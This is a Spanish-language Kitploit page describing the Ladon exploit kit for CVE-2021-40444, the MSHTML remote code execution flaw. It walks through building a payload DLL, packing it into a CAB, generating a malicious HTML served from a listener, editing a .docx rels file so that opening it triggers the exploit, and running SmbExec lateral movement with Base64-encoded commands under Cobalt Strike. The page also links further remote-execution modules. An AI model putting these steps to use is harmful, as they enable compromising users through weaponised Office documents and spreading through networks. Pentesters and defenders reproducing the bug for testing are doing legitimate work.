Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-40444 — Kit de explotación para CVE-2021-40444 ejecución remota de código en MSHTML, que incluye generación de payloads DLL, elaboración de documentos de Office y módulos de movimiento lateral (SmbExec, WmiExec) para pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/k8gege/cve-2021-40444
Generación de PayloadsExplotaciónMovimiento LateralExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubk8gege/cve-2021-40444

CVE-2021-40444

Kit de explotación para CVE-2021-40444 ejecución remota de código en MSHTML, que incluye generación de payloads DLL, elaboración de documentos de Office y módulos de movimiento lateral (SmbExec, WmiExec) para pruebas de penetración.

Ver Repositorio
2264hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

〖EXP〗Ladon CVE-2021-40444 Reproducción de vulnerabilidad de Office

Resumen de la vulnerabilidad

El 8 de septiembre, hora de Beijing, el CERT de NSFOCUS monitoreó un comunicado de seguridad de Microsoft que revelaba la vulnerabilidad de ejecución remota de código en Microsoft MSHTML. Los atacantes pueden crear controles ActiveX maliciosos para ser utilizados por documentos de Microsoft Office que emplean el motor de renderizado del navegador. Al engañar a un usuario para que abra un documento malicioso, se puede ejecutar código arbitrario en el sistema objetivo con los permisos de ese usuario. Microsoft indicó en el comunicado que ya se ha detectado explotación activa de esta vulnerabilidad, por lo que se recomienda a los usuarios afectados tomar medidas de protección.

MSHTML (también conocido como Trident) es el motor del navegador Internet Explorer de Microsoft, y también se utiliza en aplicaciones de Office para renderizar contenido alojado en web en documentos de Word, Excel o PowerPoint. El control ActiveX es un producto de la arquitectura COM de Microsoft, ampliamente utilizado en el conjunto de Office de Windows y en el navegador IE. Aprovechando el control ActiveX se puede interactuar con el componente MSHTML.

Versiones afectadas

Incluye Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022.

Funciones actualizadas de Ladon 8.9

Ladon 8.9 2021.9.14 [+] CVE-2021-40444 Vulnerabilidad de ejecución remota de código en Microsoft MSHTML, módulo de explotación para documentos de Office. Versiones afectadas: Incluye Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022. [+] CmdDll cmd a DLL (payload de comando de ejecución DLL para vulnerabilidad 0day en sistema Windows, puede conectar directamente con CobaltStrike mediante PowerShell). Vulnerabilidades de desbordamiento como MS17010, escalada de privilegios local CVE-2021-1675, etc. No desbordamiento como la reciente vulnerabilidad de Office CVE-2021-40444, etc.

Ladon 8.8 2021.9.11 [+] SmbExec NTLM-HASH no interactivo sin salida visible [u] GetInfo Añadida información de máquina virtual Vmware [u] OsScan Añadido reconocimiento de router Vigor Router [u] Añadido reconocimiento de máquinas virtuales Xen\VBOX\Hybrid\Parallels [+] GetInfo Añadido cmdkey, RrpLog, drivers instalados, lista de software, archivos accedidos recientemente, etc. [+] GetInfo Añadido GUID, CPUID, ID de disco, detección de puertas traseras de inicio automático (persistencia DLL, registro, etc.) [+] GetInfo2 Añadida obtención de información de parches WMI [+] Información predeterminada Añadido aviso destacado cuando el espacio libre en disco C es menor a 2 GB.

Uso del módulo Ladon 8.9

Uso de CmdDLL

root@kitploit:~
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

Genere el DLL con el comando CMD correspondiente según la necesidad real. El ejemplo muestra la calculadora.

Uso de CVE-2021-40444

root@kitploit:~
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

Nota: Este módulo requiere usar Ladon40.exe.

Reproducción de CVE-2021-40444

Entorno de prueba

Win10 x64 Office 2019

Instalación de Office 2019

Use cualquier versión de prueba; no es necesario activarla. Si descargó un IMG, cámbielo a ZIP y descomprima para instalar.

Generar DLL con CmdDll

CVE-2021-40444 MakeCab: convertir DLL a CAB

Como el objetivo es un sistema Win10 X64, usamos el DLL de 64 bits. Comando: Ladon CVE-2021-40444 MakeCab sc64.dll

CVE-2021-40444 MakeHtml: generar Poc.html

Al generar el HTML, la URL debe apuntar a la dirección donde Ladon escucha.

Iniciar el listener web

Modificación del documento DOC de muestra

La muestra fue publicada en el círculo pequeño el 10 de septiembre. Cambie la extensión docx a cab o zip, luego edite el archivo rels para que apunte a la URL donde Ladon escucha (poc.html), guarde y renombre de nuevo a .docx.

GIF de prueba

Al ejecutar el archivo DOC en Win10, se puede ver todo el proceso de solicitud a través del listener de Ladon: docx primero accede al HTML, luego la vulnerabilidad desencadena la carga de nuestro archivo CAB empaquetado, ejecuta la instalación INF mediante CPL y carga nuestro DLL. La funcionalidad del DLL demostrada es la calculadora.

Uso de SmbExec

root@kitploit:~
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA

Ejecución de SmbExec

Al ejecutar SmbExec bajo el shell de Cobalt Strike, si se necesitan parámetros con espacios y comillas, la transliteración de CS puede tener problemas; usar comandos CMD normales resulta problemático. Por eso añadí el parámetro b64cmd para facilitar su uso en CS (este método ya se usó en BypassUac hace meses; muchos se preguntan por qué complicarlo, pero cuando el comando CMD contiene muchas secuencias de escape, se vuelve muy complejo traducir de CS a CMD y luego al CMD real). El comando b64cmd se puede generar con LadonGUI 8.2 o posterior usando codificación Base64Unicode.

Resultado de la ejecución

Otros módulos de movimiento lateral de Ladon

IDNombre del móduloDescripciónUso
1WmiExecEjecutar comandos por puerto 135http://k8gege.org/Ladon/WinShell.html
2PsExecEjecutar comandos por puerto 445http://k8gege.org/Ladon/WinShell.html
3AtExecEjecutar comandos por puerto 445http://k8gege.org/Ladon/WinShell.html
4SshExecEjecutar comandos por puerto 22http://k8gege.org/Ladon/WinShell.html
5JspShellEjecutar comandos con una línea JSPhttp://k8gege.org/p/ladon_cs_shell.html
6WebShellEjecutar comandos con WebShellhttp://k8gege.org/Ladon/webshell.html
7WinrmExecEjecutar comandos por puerto 5895http://k8gege.org/Ladon/WinrmExec.html
8SmbExecEjecutar comandos con HASH por puerto 445http://k8gege.org/Ladon/SmbExec.html

Descarga de Ladon

PowerLadon: https://github.com/k8gege/PowerLadon Versiones anteriores: http://github.com/k8gege/Ladon/releases Versión 7.0: http://k8gege.org/Download Versión 8.9: Círculo pequeño K8

Descargar herramienta